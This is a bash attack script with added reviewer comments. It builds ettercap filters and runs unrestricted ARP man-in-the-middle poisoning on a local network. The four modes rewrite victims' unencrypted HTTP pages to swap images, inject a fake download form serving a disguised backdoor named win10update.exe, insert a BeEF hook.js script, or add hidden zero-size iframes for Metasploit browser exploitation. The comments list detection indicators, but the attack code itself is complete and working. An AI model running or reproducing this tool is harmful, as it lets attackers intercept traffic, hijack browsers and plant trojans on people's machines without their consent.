- #!/bin/bash
- #Replace images
# Reviewer annotation (comments only; every command below is unchanged).
# Despite the header above, this script offers four modes. Each mode writes an
# ettercap filter, compiles it with etterfilter and runs ettercap in ARP
# man-in-the-middle mode (-M ARP // //) on the interface entered below.
# All four filters search the packet payload (DATA.data) for plain strings,
# and three of them match TCP port 80 only, so what they alter is
# unencrypted HTTP.
# Defender view, derived from what the filters do:
#   - The ARP poisoning is not restricted to named hosts (// //); ARP
#     monitoring or dynamic ARP inspection on the switch is where it shows up.
#   - Requests reach the web server with the header name Accept-Encoding
#     replaced by "Accept-Rubbish!", which is visible in server-side logs.
#   - Serving pages over HTTPS with HSTS removes the cleartext payload that
#     the string replacements depend on.
- clear
# Delete compiled filters (.ef) left behind by an earlier run.
- rm iFrame.ef dwnloadtrojan.ef swapimg.ef beefhook.ef 2&>/dev/null
- echo -e "Ettercap Filters Compilation"
- sleep 2
- echo -e "Checking requirements..."
- sleep 1
# Root check: continue only when the numeric user id is 0; otherwise print
# the failure text and exit.
- if [[ $(id -u) = 0 ]]; then
- echo && echo -e " Checking For ROOT: PASSED"
- else
- echo && echo -e " Checking For ROOT: FAILED : This Script Needs To Run As ROOT"
- echo -e "Will Now Exit"
- echo
- sleep 1
- exit
- fi
# The interface name is stored in intface exactly as typed (read without -r,
# no validation) and is later passed to ettercap -i.
- echo -ne "What is your wireless interface? eg wlan0 : "
- read intface
- sleep 2
# Starts the local Apache service; the later prompts refer to its web root
# (/var/www). Nothing in this script stops the service again, so the web
# server keeps listening after the script ends.
- echo -e "Starting Web server..."
- service apache2 start
- sleep 2
- echo -e "Done setting"
- echo
- sleep 2
- clear
- echo -e "Ettercap Filters Compilation"
- sleep 2
- echo
# Menu: the answer is stored in choice and compared against 1-4 below.
- echo -ne "Choose:
- 1. Replace images in remote browsers
- 2. Create Trojan Downloader AD
- 3. Inject beef hook in remote browsers
- 4. Inject iFrame
- : "
- read choice
- # Replace images
# Reviewer annotation (comments only; every command below is unchanged).
# Dispatch on the menu answer. Every branch follows the same pattern: prompt
# for values, write a filter source file with a double-quoted echo (so the
# shell variables are expanded unescaped into the filter text), compile it
# with etterfilter, delete the source file, then start ettercap.
# Each filter first rewrites "gzip", "deflate" and the Accept-Encoding header
# name in the traffic it matches; the fourth filter's own comment gives the
# reason as asking the server to answer in plain text. A request header named
# "Accept-Rubbish!" is therefore a server-side indicator of these filters.
- if [[ $choice == 1 ]]; then
# Mode 1: asks for an image URL and writes it into the image-tag replacement
# applied to traffic coming from TCP port 80.
- echo -ne "An image link is required. The image should be accessible from
- a web server, either locally or internet in a URL format.
- eg: http://192.168.0.1/pwn.jpg. Place a picture in the web root (/var/www)
- and provide its link here.
- : "
- read imagelink
- sleep 1
- echo "Creating ettercap filter..."
- echo "if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"gzip\")) {
- replace(\"gzip\", \" \");
- msg(\"[*] Zapped 'gzip'\\n\");
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
- # NOTE: Replacing string MUST be same size as original string
- msg(\"Zapped 'Accept-Encoding'\\n\");
- }
- }
- if (ip.proto == TCP && tcp.src == 80) {
- replace(\"img scr=\", \"img src=\"$imagelink\"\");
- replace(\"IMG SRC=\", \"img src=\"$imagelink\"\");
- msg(\"Filter Ran.\\n\");
- }" > swapimage.filter
- sleep 1
- echo -e "Compiling filter.."
- etterfilter swapimage.filter -o swapimg.ef
- rm swapimage.filter
- sleep 2
- echo -e "Starting attack..."
# ettercap options: -i interface, -T text interface, -q quiet, -F compiled
# filter, -M ARP with both target specifications left empty (// //), so the
# poisoning is not limited to specific hosts. The same invocation closes
# every branch; ARP monitoring and dynamic ARP inspection are the controls
# that observe it.
- ettercap -i $intface -T -q -F swapimg.ef -M ARP // //
- elif [[ $choice == 2 ]]; then
- #Download Trojan
# Mode 2: runs a local crypter.py (not shown on this page) and moves its
# backdoor.exe output into the web root as win10update.exe. An executable
# with that name served over plain HTTP from a LAN host is an indicator to
# look for in proxy or DNS/HTTP logs.
- echo -e "Creating backdoor..."
- echo
- python crypter.py
- mv backdoor.exe /var/www/win10update.exe
- echo Backdoor URL: http://[yourIP]/win10update.exe
- echo -ne "Place your backdoor and an image in web root (/var/www), then
- provide their link below.
- Backdoor URL eg. http://192.168.0.1/meterpreter.exe
- : "
- read trojanlink
- echo -ne "Image URL eg. http://192.168.0.1/image.jpg
- : "
- read imagelink
# The generated filter appends an HTML form (image plus a DOWNLOAD submit
# button pointing at the supplied URL) after </title>.
- echo "if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"gzip\")) {
- replace(\"gzip\", \" \");
- msg(\"[*] Zapped 'gzip'\\n\");
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\\n\");
- # NOTE: Replacing string MUST be same size as original string
- msg(\"Zapped Accept-Encoding\"\\n\");
- }
- }
- if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"<title>\")) {
- replace(\"</title>\", \"</title><form action='$trojanlink' method=\"link\"><img src=\"$imagelink\"><INPUT TYPE=submit value=\"DOWNLOAD\"></form><html><body><h10>Just some instructions</h10></body></html>\");
- msg(\"HTML Injected\\n\");
- }
- }" > downloadtrojan.filter
- echo -e "Compiling filter.."
- etterfilter downloadtrojan.filter -o dwnloadtrojan.ef
- rm downloadtrojan.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F dwnloadtrojan.ef -M ARP // //
- elif [[ $choice == 3 ]]; then
- # Beef hook
# Mode 3: asks for the address of a host running BeEF and generates a filter
# that adds a <script> tag loading hook.js from port 3000 of that host after
# </head>. Browser requests for /hook.js on port 3000 of an internal address
# are the network-side indicator.
- echo -ne "You neet to provide IP of the PC running beef.
- Make sure beef is already started.
- : "
- read ip
- echo "if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"gzip\")) {
- replace(\"gzip\", \" \");
- msg(\"[*] Zapped 'gzip'\\n\");
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
- # NOTE: Replacing string MUST be same size as original string
- msg(\"Zapped Accept-Encoding\\n\");
- }
- }
- if (ip.proto == TCP && tcp.dst == 80) {
- if (search(DATA.data, \"</head>\")) {
- replace(\"</head>\", \"</head><script src=\"http://$ip:3000/hook.js\"></script> \");
- msg(\"Code injected. Beef Hooked\\n\");
- }
- }" > beefhook.filter
- echo -e "Compiling filter.."
- etterfilter beefhook.filter -o beefhook.ef
- rm beefhook.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F beefhook.ef -M ARP // //
- elif [[ $choice == 4 ]]; then
- #Injecting iFrame
# Mode 4: asks for an iframe URL (stored in ourIP) and for the operator's own
# IP (stored in iq). The filter text credits itself to iFrame.sh v0.1 by
# g0tmi1k. Unlike the other modes it matches any TCP traffic not destined to
# $iq rather than port 80 only, and it inserts an iframe with width, height
# and border set to 0 after </title>, </TITLE>, body> and BODY>. Zero-size
# iframes pointing at an internal address are the page-side indicator.
- echo -ne "Injecting iFrame in websites. You need to provide link to your iFrame.
- eg. http://192.168.0.1/iframe.html here
- : "
- read ourIP
- echo
- echo -ne "What is your IP?: "
- read iq
- sleep 2
- echo -e "Generating Ettercap filter.."
- echo "# iFrame.filter --- Ettercap injection filter created for Metasploit's browser_AutoPWN
- # Generated by iFrame.sh v0.1. g0tmi1k ~ 2011-01-21
- if (ip.proto == TCP && ip.dst != '$iq') { # If traffic using TCP protocol and its not comng to us,
- if (search(DATA.data, \"gzip\")) { # ...and if it contains an gzip in its header:
- replace(\"gzip\", \" \"); # Ask the server not to encode packets - only use plain text ;) *Four spaces to match original string*
- msg(\"[*] Zapped 'gzip'\\n\"); # Let us know it's been done (=
- }
- if (search(DATA.data, \"deflate\")) {
- replace(\"deflate\", \" \");
- msg(\"[*] Zapped 'deflate'\\n\");
- }
- if (search(DATA.data, \"gzip,deflate\")) {
- replace(\"gzip,deflate\", \" \");
- msg(\"[*] Zapped 'gzip,deflate'\\n\");
- }
- if (search(DATA.data, \"Accept-Encoding\")) {
- replace(\"Accept-Encoding\", \"Accept-Rubbish!\");
- msg(\"[*] Zapped 'Accept-Encoding'\\n\");
- }
- if (search(DATA.data, \"</title>\")){ # Is there something for us to inject into?
- replace(\"</title>\",\"</title><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\"); # ...Insert our iframe to the webpage!
- msg(\"[>] Injecting into (</title>)\\n\"); # Let us know we have done it (=
- }
- if (search(DATA.data, \"</TITLE>\")){
- replace(\"</TITLE>\",\"</TITLE><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
- msg(\"[>] Injecting into (</TITLE>)\\n\");
- }
- if (search(DATA.data, \"body>\")){
- replace(\"body>\",\"body><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
- msg(\"[>] Injecting into (body>)\\n\");
- }
- if (search(DATA.data, \"BODY>\")){
- replace(\"BODY>\",\"BODY><iframe src=\\\"$ourIP\\\" width=\\\"0\\\" height=\\\"0\\\" frameBorder=\\\"0\\\"></iframe>\");
- msg(\"[>] Injecting into (BODY>)\\n\");
- }
- if (search(DATA.data, \"http://$ourIP\")){ # ...and search data, to test for our 'tweak' ;)
- msg(\"[+] Injected Correctly!\\n\"); # Let us know it's been done done
- }
- }" > iFrame.filter
- echo -e "Compiling filter.."
- etterfilter iFrame.filter -o iFrame.ef
- rm iFrame.filter
- sleep 2
- echo -e "Starting attack..."
- ettercap -i $intface -T -q -F iFrame.ef -M ARP // //
- else
# Any other answer prints a message and falls off the end of the script; no
# filter is written and ettercap is not started.
- echo "Invalid choice"
- echo "Exiting.."
- sleep 2
- fi